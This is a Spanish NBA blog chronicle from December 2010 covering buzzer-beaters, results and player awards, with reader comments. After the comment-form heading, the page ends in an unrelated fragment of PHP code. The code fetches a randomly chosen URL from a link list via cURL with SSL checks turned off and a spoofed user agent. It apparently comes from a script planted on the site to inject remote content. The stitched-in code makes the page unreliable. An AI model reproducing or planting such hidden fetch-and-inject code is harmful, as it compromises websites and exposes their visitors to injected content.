La Crónica (08/12/2010): Noche de Buzzer-Beaters

09 de December de 2010 por TheDeerHunter

Hasta 4 buzzer-beaters pudimos contemplar anoche, a cada cual más espectacular. Para que no perdáis mucho tiempo buscándolos os los dejamos todos juntitos en un mismo vídeo:

Y a partir de aquí, la crónica.

A pesar de la emoción reinante en muchos pabellones, al final no hubo grandes sorpresas en esta intensa jornada de entre semana.

Los líderes sacaron adelante sus compromisos de forma cómoda. Por un lado los Spurs tuvieron simplemente que administrarse ante unos Warriors que perdieron pronto a Curry lesionado. Fue Reggie Williams quien ocupó su lugar con gran acierto, cascándose un 8 de 10 en triples que los Spurs neutralizaron con la impresionante eficacia en lanzamiento lejano que están mostrando este curso. Controlado el principal peligro aguantaron plácidamente a que los Warriors se diluyeran en casi tantas pérdidas como asistencias hicieron (94-111). Por el otro lado los Celtics aún tuvieron menos problemas contra unos Nuggets sin Carmelo para amargarle la victoria nº 1.000 a George Karl (89-105). Excelente partido del Big Three, en especial de Allen, y una inmensa aportación desde el banquillo de un “Big Baby” que no se encontraba en sus mejores condiciones por enfermedad.

De los perseguidores destaca la apuradísima victoria de los Lakers en el derbi angelino (87-86). Pau lo pasó mal contra la dupla Jordan-Griffin y Kobe tampoco anduvo sobrado contra Eric Gordon. Fue Shannon Brown quien desequilibró la balanza desde el banco y Fisher el que  culminó la remontada el último instante como tantas veces ha hecho antes. Por su parte, los Heat asaltaron el siempre complicado Energy Solutions, secando a Utah en el último cuarto e imponiendo el partidazo de Wade y LeBron (111-98). Parece que los Beach boys se han despertado. Que tiemble el mundo…

La clase media de la liga también saldó sus partidos con victorias. Los Bulls ganaron en Cleveland 88-83 a pesar del mal partido de Boozer, y los Thunder ganaron con cierto sufrimiento en Minnesotta (111-103),  con 20 puntos de Durant sólo en la segunda parte. Los Wolves, por cierto, mandaron hace unos días a Jonny Flynn a la D-League para que pille ritmo después de la lesión. Será de gran ayuda cuando se reincorpore. Los Hornets abusaron de los Pistons 74-93 con un 0-5 de Villanueva que nos evoca ciertos terribles insultos de Garnett hace unos meses. Además, los Knicks tuvieron la mayor de las coñas marineras, como ya habéis visto, en un postrero triple de Felton para ganar a los Raptors en un partido por otro lado precioso (110-113).

Para ir terminando, los Suns perdieron en la prórroga 104-98 ante los Grizzlies en un flojo partido de Nash (¿influido por los rumores?) y un inmenso Zach Randolph (en el sentido metafórico, además del literal).  Rudy Gay clavó un triplazo brutal desde la esquina para  llevar el partido al tiempo extra. Los Bucks también ganaron buzzer-beater mediante. Un palmeo de Andrew Bogut les dio una  importantísima victoria frente a los Pacers (95-97) y los Kings ganaron a los Wizards 91-116, otra vez sin Wall y sin Blatche.

PREMIOS

MVP: LeBron James y los Heat se están poniendo a tono poco a poco. El Rey anotó 33 puntos, capturó 7 rebotes y repartió 9 asistencias. Como en los viejos tiempos. De todas maneras, esos 34 puntos (15 de 19) y 17 rebotes de Zach Randolph parecen aún mejores.

Rookie: No fue el mejor de los día de Blake Griffin pero 16 puntos y 11 rebotes no dejan de ser buenos números. Y en los Kings Pooh Jeter amenaza los minutos de Udrih al conseguir 13 puntos, 9 asistencias, 4 rebotes y 2 robos. Alguno de los que comentan por aquí ya nos había puesto sobre la pista. Punto para él.

Sorpresa: Jason Thompson parece recuperar el puesto de titular que perdió en favor de Carl Landry. Ayer volvió a su nivel de antaño frente al inexistente juego interior de los Wizards con 22 puntos y 14 rebotes. Y en los Warriors el partidazo del día le tocó a Reggie Williams que pasó de la treintena de puntos.

Decepción: Dicen que el rookie Xavier Henry es un gran defensor. Se lo podríamos preguntar a Jason Richardon que anoche le sufrió y acabó marcándose un 1 de 11. De momento ya le ha quitado el puesto de titular a OJ Mayo.

Esfuerzo en vano: Ya es mala suerte que la actuación más espectacular del día en términos objetivos se haya quedado sin premio. El siempre criticado Andrea Bargnani consiguió, con 41 puntos, la mayor puntuación de su carrera y además aportó 7 rebotes y 6 asistencias. Los 22 puntos y 21 rebotes de Kevin Love ya parecen tan normales que casi nos olvidamos de destacarlos.

Comenta

18 comentarios a esta entrada

  1. Txusma dice:
    #1

    La defensa de Bledsoe en la canasta de Fisher es un poco de risa, no? Mucho más si tenemos en cuenta que Fisher es 15 años más viejo y seguro q tiene peores piernas. Eso sí, la clase no se la discute nadie.

      Citar

  2. TheDeerHunter dice:
    #2

    Ya lo dije hace tiempo… creo que en un aspecto en concreto “El pescador” es uno de los más grandes de la historia.

      Citar

  3. HeiNeKeN dice:
    #3

    La cara de Griffin es un poema, pobre chaval xD

      Citar

  4. MagicJohnson32 dice:
    #4

    Bledsoe comete un error de novato (que, al fin y al cabo, es lo que es), y es permitir a Fisher ir hacia su izquierda, que es donde Fish se siente cómodo. En una situación así tienes que forzarlo hacia su derecha.

    En cualquier caso, lo de Fisher es muy grande.

    De todos modos, conforme había ido el último minuto, la cosa tenía que acabar así. Las 4 últimas posesiones de los Lakers fueron canasta de Pau, canasta de Kobe, canasta de Kobe y canasta de Fisher, mientras que para los Clips, Gordon falla un tiro libre y pierde dos balones (dos robos de Artest, por cierto) antes de asistir para el mate de Jordan que los pone 1 arriba a 0:15 para el final.

    Ah, y el final del tercer cuarto tampoco estuvo mal: 3 triples en 13 segundos, dos de ellos de Shannon Brown, incluyendo uno desde la línea de 3 del lado contrario.

    Eso sí, los Lakers necesitan oxígeno por dentro, el regreso de Bynum (en teoría, martes próximo en Washington) les tiene que dar otra dimensión. A Pau le vendrá muy bien el descanso extra, en ocasiones se ve superado físicamente.

      Citar

  5. Hynreck dice:
    #5

    El triple de Felton entra llorando la verdad, pero la maniobra con la que se deshace de Calde es preciosa tambien. Vaya temporadita se está marcando cuando yo ya no confiaba en él para nada, está en números de All-Star casi.
    Lo de Amare ya es tremendo, éste está en números de MVP.

      Citar

  6. Busky23 dice:
    #6

    Los knicks están con la flor en el culo,todo les va d cara,los rookies,Felton,Stat en plan MVP… a ver lo que les dura.
    Muy grande “el pescador”,me ha recordado a la de las pasadas finales,como apunta Deer,en lo suyo,es un genio…15 años le sacaba al rookie…Lionel Fisher!!!

      Citar

  7. baruc dice:
    #7

    Estooo Pooh Jetter es de los Kings si no me equivoco, y no de los Wizards como se comenta en el apartado de rookies de la noche.

      Citar

  8. MagicJohnson32 dice:
    #8

    Corregido el error, gracias baruc.

    Este Jetter es el tercer partido en el que destaca en los últimos días y que Udrih se vaya con cuidado o le quitará el sitio.

      Citar

  9. Txusma dice:
    #9

    Ui! Despiste en los Jeter. Gracias por el aviso 😉

      Citar

  10. TheDeerHunter dice:
    #10

    Bueno… Udrih ha hecho hoy precisamente su mejor partido del año. Yo no lo considero un paquete. Es un base correcto pero este curso no ha encontrado todavía su juego. El anterior lo hizo francamente bien.

    En Sacramento no sé lo que está pasando: el propio Tyreke, Casspi, Thompson, Landry, Udrih… todos funcionando regular simultáneamente. Y Westphal decepcionando mucho.

      Citar

  11. alfin dice:
    #11

    busky23 los knicks pueden estar con la flor en el culo, si, pero promediar 32 puntos 2 semanass consecutivas, o puedeque en los bobcats felton no podia mostrar su potencial ofensivo, y los rookies es suerte en la eleccion, o no te acuerdas de stokton,ginobili o redd?

      Citar

  12. Scriers dice:
    #12

    Es que Sacramento lleva mil vueltas diferentes. Ahora uno titular, ahora otro, ahora el otro, ahora este 10 minutos, ahora este 30, ahora no sale. Es que hay que insistir en una idea base, y si no sale, en otra idea, pero no tener veinte ideas en veinte partidos. Lo de Evans es increíble, irreconocible.
    Yo tampoco veo a Udrich un paquete, ni mucho menos, me parece un buen base.

    Luego si ves las canastas finales, la más difícil con diferencia es la de Rudy Gay. La de Felton, el tiro es limpio y de Calderón se va fácil, la verdad es que Calderón en esos 1×1 lo pasa mal. La que peor me sentaría de todas es la de Bogut, madre mía, ni que fuera un supersaltarín.

      Citar

  13. Busky23 dice:
    #13

    Me refiero a que los knicks,después de la decepción que supuso lo del pasado verano en el mercado de agentes libres,la composición final del equipo generaba muchas dudas,empezando por Amare y su primera temporada sin Nash,el rendimiento de Felton en un esquema D’Antoni,Gallinari,los rookies…incógnitas que se están resolviendo muy positivamente,cosa que me alegro. Si a todo esto consiguen incorporar a Carmelo…que se agarren los machos en el Este

      Citar

  14. baruc dice:
    #14

    De nada por lo de Pooh Jetter, sorprendente lo suyo… sin seleccionar en el draft 2006 y pasando con mas pena que gloria por diferentes equipos de europa sin destacar NADA ( fue cortado por unicaja y ficharon en su lugar a un “portento” como es Shammond Williams ), y lo rescatan los Kings ??? Extraño…
    Saludos !

      Citar

  15. Vader dice:
    #15

    Todo esta funcionando a las mil maravillas en los Knicks, cosa que me alegra mucho porque yo soy seguidor de ese equipo en la NBA y no ganabamos para disgustos desde que se retiro Pat Ewing, que mira que ya ha llovido…

    Pero una cosa esta clara, por lo menos para mi, a los Knicks les falta muchisimo para ser un aspirante al título. En las previsiones más optimistas y que se pudiera fichar a Carmelo aún harian falta muchos refuerzos, sobretodo en el juego interior.

    Con el equipo de ahora los Knicks tienen para llegar a playoff y gustar por su juego. Con Carmelo serian equipo seguro de playoff cada año y luchando por finales de conferencia. Pero para ser un aspirante al título a parte de Carmelo se necesitarian uno o dos refuerzos serios en el juego interior y que el equipo pudiera jugar a algo más que el Run&Gun.

    Con este juego rápido se pueden ganar muchos partidos en liga regular y por lo menos la gente del Madison se divierte que ya le tocaba. Pero a la hora de jugarse las castañas contra Celtics, Orlando o Miami con este esquema de juego no creo que se llegara muy lejos.

    Lo dicho, hemos salido del pozo pero para volver a la elite de la liga nos hacen falta unas cuantas buenas decisiones más desde los despachos.

    Saludos

      Citar

  16. LEmontus dice:
    #16

    el jetter ese se la lió a clippers y fue la primera que lo vez que lo escuché en mi vida hace tres días por lo visto es bastante golfo e imagino que será por eso que ha tenido tan pocas oportunidades.

      Citar

  17. alfin dice:
    #17

    memphis 65- clippers 66 4arto cuarto 11:35

      Citar

  18. alfin dice:
    #18

    final del partido: memphis 84- clippers 83
    marc 17 ptos. 8 reb. y 4 ast.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>